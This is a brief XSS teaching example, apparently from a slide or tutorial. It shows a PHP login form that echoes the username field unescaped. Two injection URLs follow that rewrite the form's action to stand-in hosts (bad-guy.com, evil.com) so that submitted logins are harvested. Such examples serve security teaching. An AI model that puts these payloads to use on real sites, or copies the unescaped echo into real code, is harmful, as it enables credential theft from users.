XSS Example
XSS Example
<form action=
"login.php"
method=
"POST"
>
User: <input type=
"text"
name=
"username"
value=
"<?php echo
$
_POST['username']; ?>"
/>
Pass: <input type=
"password"
name=
"password"
/>
<input type=
"submit"
name=
"Submit"
value=
"Submit"
/>
./?username="><script> document.forms[0].action='http://bad-guy.com/harvest.php';
</script><x x="
./?username=" onChange="document.forms[0].action='http://evil.com/harvest.php';